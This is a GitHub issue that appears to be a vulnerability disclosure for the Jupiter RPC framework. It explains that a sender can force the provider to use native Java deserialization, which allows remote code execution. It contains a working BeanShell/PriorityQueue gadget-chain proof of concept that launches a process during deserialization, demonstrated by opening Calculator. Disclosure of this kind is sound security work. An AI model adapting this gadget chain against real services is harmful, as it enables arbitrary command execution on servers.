Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Another approach capable of achieving RCE attacks #114

Open
adv851 opened this issue Nov 2, 2023 · 0 comments
Open

Another approach capable of achieving RCE attacks #114

adv851 opened this issue Nov 2, 2023 · 0 comments

Comments

@adv851
Copy link

adv851 commented Nov 2, 2023

Problem Description

As Jupiter's deserialization protocol is dictated by the sender's request configuration, attackers can induce the Provider side to employ the Native JDK protocol for deserializing carefully crafted serialized data, thereby accomplishing an RCE attack.

Reproduce

Provider

We employed the built-in module "jupiter-example" of the project to set up the test environment for the attack. The JDK version used is 8u65.
截屏2023-11-02 22 54 28

POC
截屏2023-11-02 22 46 53

At line 66, change the deserialization protocol to Native JAVA, and at line 70, replace the malicious injection object (there are several known candidate injection objects, one is selected here as an example, and this chain depends on the following JAR files).

<dependency>
            <groupId>org.beanshell</groupId>
            <artifactId>bsh</artifactId>
            <version>2.0b5</version>
        </dependency>

public static Object getBshObject() throws Exception {
        // BeanShell payload

        String payload =
                "compare(Object foo, Object bar) {new java.lang.ProcessBuilder(new String[]{" +
                        Strings.join( // does not support spaces in quotes
                                Arrays.asList("open /System/Applications/Calculator.app".replaceAll("\\\\","\\\\\\\\").replaceAll("\"","\\\"").split(" ")),
                                ",", "\"", "\"") +
                        "}).start();return new Integer(1);}";

        // Create Interpreter
        Interpreter i = new Interpreter();

        // Evaluate payload
        i.eval(payload);

        // Create InvocationHandler
        XThis xt = new XThis(i.getNameSpace(), i);
        InvocationHandler handler = (InvocationHandler) Reflections.getField(xt.getClass(), "invocationHandler").get(xt);

        // Create Comparator Proxy
        Comparator comparator = (Comparator) Proxy.newProxyInstance(Comparator.class.getClassLoader(), new Class<?>[]{Comparator.class}, handler);

        // Prepare Trigger Gadget (will call Comparator.compare() during deserialization)
        final PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, comparator);
        Object[] queue = new Object[] {1,1};
        Reflections.setFieldValue(priorityQueue, "queue", queue);
        Reflections.setFieldValue(priorityQueue, "size", 2);

        return priorityQueue;
    }

Attack Impact

Capable of executing an RCE attack, in this attack test, it is demonstrated through the launch of the calculator application.
截屏2023-11-02 22 51 49
截屏2023-11-02 22 52 28
截屏2023-11-02 22 52 50
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@adv851